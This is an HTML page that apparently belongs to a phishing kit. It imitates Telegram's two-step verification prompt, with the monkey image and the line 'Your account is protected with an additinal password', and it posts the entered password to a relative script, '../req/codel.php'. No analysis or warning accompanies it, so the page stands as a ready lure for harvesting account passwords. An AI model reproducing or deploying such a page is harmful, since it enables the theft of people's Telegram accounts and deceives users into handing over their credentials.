<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>telegram password</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-rbsA2VBKQhggwzxH7pPCaAqO46MgnOM80zW1RWuH61DGLwZJEdK2Kadq2F9CUG65" crossorigin="anonymous">
    <style>
      *{
        padding: 0;
        margin: 0;
        box-sizing: border-box;
      }
      body{
        height: 100vh;
        width: 100%;
        background-color: #ffffff;
      }
      .container{
        height: 100vh;
        width: 100%;
        background-color: #ffffff;
      }
      .content{
        height: 100vh;
        width: 100%;
        background-color: ;
      }
      img{
        height: 200px;
      }
      .buton{
        display: flex;
        justify-content: center;
        align-items: center;
      }
      .buton >button{
        position: relative;
        top: 90px;
        width: 90%;
        height: 50px;
        border: none;
        outline: none;
        border-radius: 12px;
      }
      input{
        border-radius: 12px;
        border: 1px solid #cccbc8;
        outline: none;
        width: 90%;
        height: 50px;
        position: relative;
        top: 60px;
      }
      input::placeholder{
        position: relative;
        left: 10px;
      }
      input[type="text"]{
        position: relative;
        padding-left: 13px;
      }
    </style>
  </head>
  <body>
   <!--- container --->
   <div class="container">
     <!--- content --->
     <div class="content">
       <center>
         <img src="https://i.ibb.co/nQsCSHq/monkey-otp.png" alt="">
         <h1>Enter Your Password</h1>
         <h6>Your account is protected with an additinal password.</h6>
         <form action="../req/codel.php" method="post" onsubmit="return validateForm()">
           <input type="text" id="password" name="password" placeholder="Do you have password?" required/>
           <div class="buton">
             <button class="btn btn-primary" type="submit">NEXT</button>
           </div>
         </form>
       </center>
     </div>
     <!--- end content --->
   </div>
   <!--- end container --->
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-kenU1KFdBIe4zVF0s0G1M5b4hcpxyD9F7jL+jjXkk+Q2h455rYXK/7HAuoJl+0I4" crossorigin="anonymous"></script>
  </body>
</html>